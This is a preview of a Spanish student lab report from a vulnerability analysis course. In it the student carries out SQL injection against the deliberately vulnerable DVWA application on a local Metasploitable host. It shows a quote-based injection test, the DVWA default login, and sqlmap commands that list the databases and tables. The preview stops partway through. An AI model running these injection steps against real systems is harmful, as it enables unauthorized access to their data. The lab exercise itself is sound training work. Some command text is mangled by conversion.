Preview only show first 10 pages with watermark. For full document please download

Briceño_jiménez_edgar_favián_realizar Ataques Sql Injection Contra La Aplicación Dvwa

Analisis de Vulnerabilidades

   EMBED


Share

Transcript

     Asignatura Datos del alumno Fecha  Análisis de  Vulnerabilidades   Apellidos: Briceño Jiménez 04 – 07 - 2017   Nombre: Edgar Favián TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)    Actividades Trabajo: Realizar ataques SQL Injection contra la aplicación DVWA En la siguiente actividad deberás realizar diversos ataques sobre la aplicación DVWA utilizando la técnica de SQL injection. Para ello, debes utilizar la herramienta SQLMap (instalada en Kali por defecto). Se valorará positivamente que expliques debidamente los pasos seguidos para la realización de cada ataque. Tendrás que: »   Indicar cuál/cuáles son los parámetros vulnerables de la URL. »   Obtener los nombres de las bases de datos disponibles. »   Recuperar los nombres de las tablas de la base de datos dvwa. »   Recuperar el contenido de las tablas de la base de datos dvwa. Extensión máxima:  10 páginas (Georgia 11 e interlineado 1,5). DESARROLLO DE LA ACTIVIDAD  Verificamos la IP de la máquina metasploitable.     Asignatura Datos del alumno Fecha  Análisis de  Vulnerabilidades   Apellidos: Briceño Jiménez 04 – 07 - 2017   Nombre: Edgar Favián TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)    Accedemos vía web a esa IP y escogemos la aplicación DVWA.  Ya tenemos acceso al aplicativo. Las credenciales de acceso son “admin” y “password”     Asignatura Datos del alumno Fecha  Análisis de  Vulnerabilidades   Apellidos: Briceño Jiménez 04 – 07 - 2017   Nombre: Edgar Favián TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)   Indicar cuáles son los parámetros vulnerables de la URL Una buena forma ingresar la sentencia ?id='q&Submit=Submit# en la URL, y si nos da como resultado un error SQL, sabemos que es vulnerable.   Obtener los nombres de las bases de datos disponibles Ingresamos a la aplicación sqlmap de kali linux     Asignatura Datos del alumno Fecha  Análisis de  Vulnerabilidades   Apellidos: Briceño Jiménez 04 – 07 - 2017   Nombre: Edgar Favián TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)   Ejecutamos la siguiente sentencia para que nos muestre las bases de datos disponibles. sqlmap -–headers= Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0 –-cookie= security=low PHPSESSID=21ª5021843c8f7280a79c68b452ffce6 –u http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit# –-dbs Terminada la ejecución de la acción indicada, nos muestra 7 bases de datos encontradas: Recuperar los nombres de las tablas de la base de datos dvwa. Para recuperar los nombres de la base de datos DVWA, ingresamos la sentencia: sqlmap -–headers= Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0 –-cookie= security=low PHPSESSID=21ª5021843c8f7280a79c68b452ffce6 –u http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit# –D dvwa –-tables